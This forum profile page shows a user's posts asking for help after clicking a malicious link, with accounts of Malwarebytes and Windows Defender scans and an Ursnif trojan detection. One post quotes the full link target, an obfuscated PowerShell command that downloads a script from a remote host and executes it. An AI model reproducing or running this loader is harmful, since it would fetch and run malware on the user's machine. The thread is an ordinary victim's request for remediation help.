Jump to content


  • Content Count

  • Joined

  • Last visited

About themb

  • Rank
    New Member
  1. The only log I found from MBar is the attached one. I'm not sure if it's helpful, but, I thought I'd include it. system-log.txt
  2. Howdy. Thanks again for the help. I ran the MalwareBytes Anti-rootkit. It didn't find anything, but there's also no log on the folder I extracted it to. Attached is a MalwareBytes non-safe mode scan log. I think you're right. Looking at the Windows Defender quarantine log, the detect and quarantine was from the day I clicked on the link. Do you suggest anything else, or do you think Windows Defender handled it when I clicked it? Malwarebyteslog-normal.txt
  3. Sorry for the delay. The anxiety of being infected led to me just not using this computer. So, I booted into safe mode and did 2 Malwarebytes scans. Attached are my logs. I also just ran a Windows Defender offline scan, but I wasn't present to see the results, and my computer restarted. Some more information: When I first clicked the link, Windows Defender popped up that something was found, but then it immediately went away. I think whatever I downloaded was blocking Windows Defender from displaying the infection. I have since ran more Windows Defender scans. Tonight it finally found and removed: Trojan:Win32/Ursnif!MTB. I don't know if this is just one of multiple viruses I now have. I know other people who clicked this same link were told to run a FRST64 text file or something. Is there anything like that I should do? I am going to bed now, but I will check this thread again tomorrow and run any recommended procedures. Thanks so much for the help! Malwarebytessafemodescan.txt Malwarebytessafemodescan2.txt
  4. I wasn't paying close enough attention, and ended up clicking a link that I thought was a video file. The link directed to "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ok=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $ok;$isp=((New-Object Net.WebClient)).DownloadString('http://shortit.xyz/stats');s $isp" I've seen a few other people reporting this same thing on the forum. I was hoping to get some assistance. Here are my scan logs. Thank you very much for any help! AdwCleaner[S00].txt Malwarebyteslog.txt FRST.txt Addition.txt
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.